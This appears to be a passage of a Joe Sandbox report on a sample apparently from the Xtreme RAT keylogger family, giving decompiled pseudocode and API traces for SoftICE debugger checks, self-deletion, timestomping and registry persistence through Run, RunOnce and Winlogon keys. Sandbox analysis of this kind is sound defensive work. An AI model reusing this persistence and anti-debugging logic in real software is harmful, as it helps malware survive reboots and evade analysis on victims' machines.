						RegQueryValueExW(_v16, _t80, 0,  &_v20, E00C81CF4( *_t63),  &_v24);
					}
					RegCloseKey(_v16);
				}
				if(E00C81F1C(0xc82f8c,  *_t63) > 0) {
					E00C81E40( *_t63, E00C81F1C(0xc82f8c,  *_t63) - 1, 1, E00C81F1C(0xc82f8c,  *_t63) - 1, _t63);
				}
				_pop(_t72);
				 *[fs:eax] = _t72;
				_push(E00C82F7E);
				E00C81B90( &_v12, 2);
				return E00C81B78( &_a8);
			}

0x00c82e78
0x00c82e7b
0x00c82e7e
0x00c82e80
0x00c82e86
0x00c82e8e
0x00c82e96
0x00c82e9d
0x00c82e9e
0x00c82ea3
0x00c82ea6
0x00c82eae
0x00c82ecc
0x00c82ee2
0x00c82eee
0x00c82ef0
0x00c82ef5
0x00c82ef7
0x00c82ef9
0x00c82ef9
0x00c82efe
0x00c82f1a
0x00c82f1a
0x00c82f23
0x00c82f23
0x00c82f36
0x00c82f4f
0x00c82f4f
0x00c82f56
0x00c82f59
0x00c82f5c
0x00c82f69
0x00c82f76

APIs

Part of subcall function 00C81FB0: SysAllocStringLen.OLEAUT32(?,?), ref: 00C81FBE

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EC5
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EE9
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 00C82F1A
RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C), ref: 00C82F23

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83B10, Relevance: 6.0, APIs: 4, Instructions: 49

C-Code - Quality: 30%

			E00C83B10(long __eax) {
				void* _v8;
				void* _v12;
				void* _t15;
				intOrPtr _t25;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t27 = _t29;
				_t30 = _t29 + 0xfffffff8;
				_v8 = 0;
				_v12 = OpenProcess(0x410, 0, __eax);
				if(_v12 == 0) {
					L5:
					return _v8;
				} else {
					_push(_t27);
					_push(0xc83b8b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t30;
					_v8 = VirtualAlloc(0, 0x208, 0x1000, 4);
					_push(0x104);
					_push(_v8);
					_push(0);
					_t15 = _v12;
					_push(_t15);
					L00C83B08();
					if(_t15 != 0) {
						_pop(_t25);
						 *[fs:eax] = _t25;
						_push(E00C83B92);
						return CloseHandle(_v12);
					} else {
						E00C81520();
						goto L5;
					}
				}
			}

0x00c83b11
0x00c83b13
0x00c83b18
0x00c83b28
0x00c83b2f
0x00c83b92
0x00c83b98
0x00c83b31
0x00c83b33
0x00c83b34
0x00c83b39
0x00c83b3c
0x00c83b52
0x00c83b55
0x00c83b5d
0x00c83b5e
0x00c83b60
0x00c83b63
0x00c83b64
0x00c83b6b
0x00c83b76
0x00c83b79
0x00c83b7c
0x00c83b8a
0x00c83b6d
0x00c83b6d
0x00000000
0x00c83b6d
0x00c83b6b

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00C83B23
VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,?), ref: 00C83B4D
GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,?), ref: 00C83B64
CloseHandle.KERNEL32(?), ref: 00C83B85

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C897F4, Relevance: 6.0, APIs: 4, Instructions: 29
sleep

C-Code - Quality: 92%

			E00C897F4(WCHAR* _a4) {
				void* _t3;
				int _t5;
				WCHAR* _t6;
				WCHAR* _t7;

				_t6 = _a4;
				while(1) {
					_t7 = _t6;
					_t3 = E00C835B0(_t7);
					if(_t3 != 1) {
						break;
					}
					SetFileAttributesW(_t7, 0x80);
					_t5 = DeleteFileW(_t7);
					asm("sbb eax, eax");
					_t3 = _t5 + 1;
					if(_t3 != 1) {
						Sleep(0x3e8);
						continue;
					}
					break;
				}
				ExitProcess(0);
				return _t3;
			}

0x00c897f9
0x00c89823
0x00c89823
0x00c89827
0x00c8982e
0x00000000
0x00000000
0x00c89804
0x00c8980a
0x00c89812
0x00c89814
0x00c89817
0x00c8981e
0x00000000
0x00c8981e
0x00000000
0x00c89817
0x00c89832
0x00c8983a

APIs

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89804
DeleteFileW.KERNEL32(?,?,00000080), ref: 00C8980A
Sleep.KERNEL32(000003E8,?,?,00000080), ref: 00C8981E
ExitProcess.KERNEL32(00000000,?,?,00000080), ref: 00C89832

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83804, Relevance: 6.0, APIs: 4, Instructions: 23
windowsleep

C-Code - Quality: 100%

			E00C83804(struct tagMSG* __eax) {
				int _t6;
				MSG* _t7;

				_t7 = __eax;
				_t6 = 0;
				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
					_t6 = 1;
					TranslateMessage(_t7);
					DispatchMessageA(_t7);
				}
				Sleep(5);
				return _t6;
			}

0x00c83806
0x00c83808
0x00c8381a
0x00c8381c
0x00c8381f
0x00c83825
0x00c83825
0x00c8382c
0x00c83835

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00C83813
TranslateMessage.USER32 ref: 00C8381F
DispatchMessageA.USER32 ref: 00C83825
Sleep.KERNEL32(00000005,00000001,?,00C83842), ref: 00C8382C

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C81CD8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26

C-Code - Quality: 29%

			E00C81CD8(void* __eax, void* __ecx, intOrPtr __edx) {
				void* _t5;
				intOrPtr* _t6;
				void* _t7;
				intOrPtr _t19;
				void* _t21;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr _t32;
				intOrPtr* _t34;

				_t23 = __edx;
				_t21 = __ecx;
				_push(__ecx);
				asm("repne scasw");
				if(0 == 0) {
					__ecx =  !__ecx;
				}
				_pop(_t5);
				_t22 = _t21 + _t5;
				_pop(_t6);
				if(_t22 == 0) {
					_t24 =  *_t6;
					if(_t24 != 0) {
						 *_t6 = 0;
						_push(_t6);
						L00C810A0();
						_t7 = _t24;
						return _t7;
					}
					return _t6;
				} else {
					_push(_t6);
					_push(_t22);
					_push(_t23);
					L00C81090();
					if(_t6 == 0) {
						_t23 =  *_t34;
						_t32 = _t23;
						_t19 = 1;
						if( *0xc8c004 != 0) {
							 *0xc8c004();
						}
						if(_t19 != 0) {
							if(_t19 <= 0x18) {
								_t2 = _t19 + 0xc8b050; // 0xc9c8cccb
								_t19 =  *_t2;
							}
						} else {
							_t19 =  *((intOrPtr*)(E00C824B8() + 4));
						}
						return E00C81180(_t32);
					} else {
						_pop(_t27);
						_push( *_t27);
						 *_t27 = _t6;
						L00C810A0();
						return _t6;
					}
				}
			}

0x00c81cd8
0x00c81cd8
0x00c81cda
0x00c81cdf
0x00c81ce2
0x00c81ce4
0x00c81ce4
0x00c81ce6
0x00c81ce7
0x00c81ce9
0x00c81c6e
0x00c81b78
0x00c81b7c
0x00c81b7e
0x00c81b84
0x00c81b86
0x00c81b8b
0x00000000
0x00c81b8b
0x00c81b8c
0x00c81c74
0x00c81c74
0x00c81c75
0x00c81c76
0x00c81c77
0x00c81c7e
0x00c811db
0x00c8118e
0x00c81192
0x00c8119c
0x00c811a2
0x00c811a2
0x00c811aa
0x00c811bc
0x00c811c2
0x00c811c2
0x00c811c2
0x00c811ac
0x00c811b1
0x00c811b1
0x00c811d5
0x00c81c84
0x00c81c84
0x00c81c85
0x00c81c87
0x00c81c89
0x00c81c8e
0x00c81c8e
0x00c81c7e

APIs

SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
SysFreeString.OLEAUT32(?), ref: 00C81C89

Strings

%DEFAULTBROWSER%, xrefs: 00C81C76, 00C81C85

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C88804, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18

C-Code - Quality: 100%

			E00C88804() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0);
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}

0x00c88805
0x00c8881e
0x00c88826
0x00c88829
0x00c8882e
0x00c8882e
0x00c88833

APIs

CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C8881E
CloseHandle.KERNEL32(00000000), ref: 00C88829

Strings

\\.\SICE, xrefs: 00C88819

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C88840, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18

C-Code - Quality: 100%

			E00C88840() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0);
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}

0x00c88841
0x00c8885a
0x00c88862
0x00c88865
0x00c8886a
0x00c8886a
0x00c8886f

APIs

CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C8885A
CloseHandle.KERNEL32(00000000), ref: 00C88865

Strings

\\.\NTICE, xrefs: 00C88855

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8387C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
thread

C-Code - Quality: 75%

			E00C8387C(void* __eax) {
				void* _t5;
				void* _t7;

				_t7 = __eax;
				TerminateThread(__eax, 1);
				asm("sbb ebx, ebx");
				CloseHandle(_t7);
				return _t5 + 1;
			}

0x00c8387e
0x00c83883
0x00c8388b
0x00c8388f
0x00c83898

APIs

TerminateThread.KERNEL32(00000000,00000001,?,XtremeKeylogger,00C878B4,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000007,00000000), ref: 00C83883
CloseHandle.KERNEL32(00000000), ref: 00C8388F

Strings

XtremeKeylogger, xrefs: 00C8387C

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C81C6C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13

C-Code - Quality: 56%

			E00C81C6C(signed int __eax, void* __ecx, void* __edx) {
				void* _t4;
				signed char _t15;
				void* _t18;
				void* _t19;
				void* _t23;

				_t18 = __edx;
				_t3 = __eax;
				if(__ecx == 0) {
					_t19 =  *__eax;
					if(_t19 != 0) {
						 *__eax = 0;
						_push(__eax);
						L00C810A0();
						_t4 = _t19;
						return _t4;
					}
					return __eax;
				} else {
					_push(__eax);
					_push(__ecx);
					_push(__edx);
					L00C81090();
					if(__eax == 0) {
						__eax = __eax & 0x0000007f;
						__edx =  *__esp;
						_t23 = _t18;
						_t15 = _t3 & 0x0000007f;
						if( *0xc8c004 != 0) {
							 *0xc8c004();
						}
						if(_t15 != 0) {
							if(_t15 <= 0x18) {
								_t2 = _t15 + 0xc8b050; // 0xc9c8cccb
								_t15 =  *_t2;
							}
						} else {
							_t15 =  *(E00C824B8() + 4);
						}
						return E00C81180(_t23);
					} else {
						_pop(__edx);
						_push( *__edx);
						 *__edx = __eax;
						L00C810A0();
						return __eax;
					}
				}
			}

0x00c81c6c
0x00c81c6c
0x00c81c6e
0x00c81b78
0x00c81b7c
0x00c81b7e
0x00c81b84
0x00c81b86
0x00c81b8b
0x00000000
0x00c81b8b
0x00c81b8c
0x00c81c74
0x00c81c74
0x00c81c75
0x00c81c76
0x00c81c77
0x00c81c7e
0x00c811d8
0x00c811db
0x00c8118e
0x00c81192
0x00c8119c
0x00c811a2
0x00c811a2
0x00c811aa
0x00c811bc
0x00c811c2
0x00c811c2
0x00c811c2
0x00c811ac
0x00c811b1
0x00c811b1
0x00c811d5
0x00c81c84
0x00c81c84
0x00c81c85
0x00c81c87
0x00c81c89
0x00c81c8e
0x00c81c8e
0x00c81c7e

APIs

SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
SysFreeString.OLEAUT32(?), ref: 00C81C89

Strings

%DEFAULTBROWSER%, xrefs: 00C81C76, 00C81C85

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Analysis Process: svchost.exe PID: 3680 Parent PID: 3644

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	37.9%
Total number of Nodes:	66
Total number of Limit Nodes:	3

Executed Functions

Function 00C88ECC, Relevance: 70.5, APIs: 23, Strings: 17, Instructions: 457
librarysleepfileCrypto

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00C88ECC(intOrPtr _a4) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int* _t92;
				signed int _t93;
				void* _t105;
				void* _t120;
				void* _t125;
				void* _t160;
				void* _t182;
				void* _t297;
				intOrPtr* _t302;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t309;
				void* _t323;
				intOrPtr _t328;
				intOrPtr _t331;
				long _t358;
				void* _t360;
				void* _t361;
				intOrPtr _t362;

				asm("das");
				 *_t92 = _t92 +  *_t92;
				 *((intOrPtr*)(_t92 + _t92)) =  *((intOrPtr*)(_t92 + _t92)) + _t323;
				 *_t92 = _t92 +  *_t92;
				 *[cs:esi] =  *[cs:esi] + _t92;
				if ( *[cs:esi] != 0) goto L1;
				asm("outsb");
				 *_t302 =  *_t302 + _t92;
				if ( *_t302 == 0) goto L2;
				_t93 =  *_t92 * 0x6e006f;
				if (_t93 >= 0) goto L3;
				 *_t93 =  *_t93 + _t93;
				 *_t93 =  *_t93 + _t93;
				asm("outsd");
				 *_t93 =  *_t93 + _t323;
				 *[gs:esi] =  *[gs:esi] + _t305;
				 *_t93 =  *_t93 + _t93;
				 *_t93 =  *_t93 + _t93;
				_t360 = _t361;
				_t362 = _t361 + 0xffffffe8;
				_push(_t302);
				LoadLibraryA("user32.dll"); // executed
				LoadLibraryA("advapi32.dll"); // executed
				LoadLibraryA("shell32.dll"); // executed
				LoadLibraryA("shlwapi.dll");
				LoadLibraryA("kernel32.dll");
				_v8 = 0;
				E00C8263C(0, 0, _a4 + 0x135e); // executed
				_t105 = CreateFileW(_a4 + 0x181c, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t303 = _t105;
				if(_t303 != 0xffffffff) {
					_v20 = GetFileSize(_t303, 0);
					_v16 = 0;
					_t358 = _v20;
					_t297 = VirtualAlloc(0, _t358, 0x1000, 4); // executed
					_v8 = _t297;
					SetFilePointer(_t303, 0, 0, 0); // executed
					ReadFile(_t303, _v8, _t358,  &_v12, 0); // executed
				}
				CloseHandle(_t303);
				_v12 = 0;
				Sleep(0x2710); // executed
				_v24 = E00C833A8(_a4 + 0x181c, L" restart", _a4 + 0x181c);
				_v28 = E00C833A8(L"explorer.exe ", _a4 + 0x181c, _a4 + 0x181c);
				L6:
				while(1) {
					if( *((char*)(_a4 + 0x1258)) == 1) {
						if( *((char*)(_a4 + 0x12d8)) == 1) {
							E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48(_a4 + 0x181c) + _t291, 0, _a4 + 0x181c); // executed
						}
						if( *((char*)(_a4 + 0x12d9)) == 1) {
							E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48(_a4 + 0x181c) + _t282, 0, _a4 + 0x181c); // executed
						}
						if( *((char*)(_a4 + 0x12da)) == 1) {
							SHDeleteKeyW(0x80000001, _a4 + 0x1e3a); // executed
							E00C888D0(0x80000002, _a4 + 0x1e3a, 2, E00C82E48(_v24) + _t273, 0, _v24); // executed
						}
						if( *((char*)(_a4 + 0x12f2)) == 1) {
							if( *((char*)(_a4 + 0x12f3)) == 1) {
								E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48(_a4 + 0x181c) + _t254, 0, _a4 + 0x181c);
								E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48(_a4 + 0x181c) + _t263, 0, _a4 + 0x181c);
							}
							if( *((char*)(_a4 + 0x12f4)) == 1) {
								E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48(_a4 + 0x181c) + _t238, 0, _a4 + 0x181c);
								E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48(_a4 + 0x181c) + _t246, 0, _a4 + 0x181c);
							}
							if( *((char*)(_a4 + 0x12f5)) == 1) {
								E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48(_v28) + _t224, 0, _v28);
								E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48(_v28) + _t230, 0, _v28);
							}
							if( *((char*)(_a4 + 0x12f6)) == 1) {
								E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48(_a4 + 0x181c) + _t208, 0, _a4 + 0x181c);
								E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48(_a4 + 0x181c) + _t217, 0, _a4 + 0x181c);
							}
						}
					}
					if(E00C835B0(_a4 + 0x181c) != 0 || E00C834C4(_a4 + 0x1a26) == 0) {
						L33:
						_t120 = E00C8263C(0, 0, _a4 + 0x1310); // executed
						_t304 = _t120;
						if(GetLastError() == 0xb7) {
							CloseHandle(_t304);
						} else {
							CloseHandle(_t304);
							ShellExecuteW(0, L"open", _a4 + 0x181c, 0, 0, 0); // executed
						}
						_t125 = E00C8263C(0, 0, _a4 + 0x1326); // executed
						_t303 = _t125;
						if(GetLastError() != 0xb7) {
							CloseHandle(_t303);
						} else {
							ExitProcess(0);
						}
						Sleep(0x1388); // executed
						continue;
					} else {
						if(_v16 != 0) {
							if(__eflags <= 0) {
								L29:
								if( *((char*)(_a4 + 0x1235)) != 1) {
									goto L33;
								}
								SetFileAttributesW(_a4 + 0x1a26, 0x80);
								SetFileAttributesW(_a4 + 0x181c, 0x80);
								E00C81248();
								_push(_t360);
								_push(0xc89399);
								_push( *[fs:eax]);
								 *[fs:eax] = _t362;
								_push(E00C812A4(0x1b) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xb) + 1);
								_t160 = E00C812A4(6);
								_pop(_t306);
								E00C83BC4(_a4 + 0x1a26, _t303, _t306, _t160 + 0x7d1);
								_pop(_t328);
								 *[fs:eax] = _t328;
								_push(_t360);
								_push(0xc89416);
								_push( *[fs:eax]);
								 *[fs:eax] = _t362;
								_push(E00C812A4(0x1b) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xb) + 1);
								_t182 = E00C812A4(6);
								_pop(_t309);
								E00C83BC4(_a4 + 0x181c, _t303, _t309, _t182 + 0x7d1);
								_pop(_t331);
								 *[fs:eax] = _t331;
								E00C83674(_a4 + 0x1a26);
								E00C83674(_a4 + 0x181c);
								goto L33;
							}
							L28:
							E00C83218(_a4 + 0x181c, _v8, _v20, _v16);
							goto L29;
						}
						if(_v20 <= 0) {
							goto L29;
						}
						goto L28;
					}
				}
			}

0x00c88ecc
0x00c88ecd
0x00c88ecf
0x00c88ed2
0x00c88ed4
0x00c88ed8
0x00c88eda
0x00c88edb
0x00c88ede
0x00c88ee0
0x00c88ee6
0x00c88ee8
0x00c88eea
0x00c88eec
0x00c88eed
0x00c88ef0
0x00c88ef4
0x00c88ef6
0x00c88ef9
0x00c88efb
0x00c88efe
0x00c88f06
0x00c88f10
0x00c88f1a
0x00c88f24
0x00c88f2e
0x00c88f35
0x00c88f45
0x00c88f62
0x00c88f67
0x00c88f6c
0x00c88f78
0x00c88f7b
0x00c88f85
0x00c88f8b
0x00c88f90
0x00c88f9a
0x00c88fab
0x00c88fab
0x00c88fb1
0x00c88fb8
0x00c88fc0
0x00c88fd7
0x00c88fed
0x00000000
0x00c88ff0
0x00c88ffa
0x00c8900a
0x00c8903d
0x00c8903d
0x00c8904c
0x00c8907f
0x00c8907f
0x00c8908e
0x00c8909e
0x00c890ca
0x00c890ca
0x00c890d9
0x00c890e9
0x00c8911c
0x00c89152
0x00c89152
0x00c89161
0x00c89190
0x00c891c2
0x00c891c2
0x00c891d1
0x00c891f6
0x00c8921e
0x00c8921e
0x00c8922d
0x00c89260
0x00c89296
0x00c89296
0x00c8922d
0x00c890d9
0x00c892aa
0x00c8943a
0x00c89447
0x00c8944c
0x00c89458
0x00c8947e
0x00c8945a
0x00c8945b
0x00c89476
0x00c89476
0x00c89490
0x00c89495
0x00c894a1
0x00c894ad
0x00c894a3
0x00c894a5
0x00c894a5
0x00c894b7
0x00000000
0x00c892c5
0x00c892c9
0x00c892d3
0x00c892eb
0x00c892f5
0x00000000
0x00000000
0x00c89309
0x00c8931c
0x00c89321
0x00c89328
0x00c89329
0x00c8932e
0x00c89331
0x00c8933f
0x00c8934b
0x00c89357
0x00c89363
0x00c8936f
0x00c89375
0x00c89389
0x00c8938a
0x00c89391
0x00c89394
0x00c893a5
0x00c893a6
0x00c893ab
0x00c893ae
0x00c893bc
0x00c893c8
0x00c893d4
0x00c893e0
0x00c893ec
0x00c893f2
0x00c89406
0x00c89407
0x00c8940e
0x00c89411
0x00c89428
0x00c89435
0x00000000
0x00c89435
0x00c892d5
0x00c892e6
0x00000000
0x00c892e6
0x00c892cf
0x00000000
0x00000000
0x00000000
0x00c892d1
0x00c892aa

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C88F06
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88F10
LoadLibraryA.KERNEL32(shell32.dll), ref: 00C88F1A
LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C88F24
LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C88F2E

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C88F62
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,kernel32.dll,shlwapi.dll,shell32.dll,advapi32.dll), ref: 00C88F71
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?), ref: 00C88F8B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000), ref: 00C88F9A
ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C88FAB
CloseHandle.KERNEL32(00000000), ref: 00C88FB1
Sleep.KERNEL32(00002710,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,kernel32.dll,shlwapi.dll,shell32.dll,advapi32.dll), ref: 00C88FC0

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
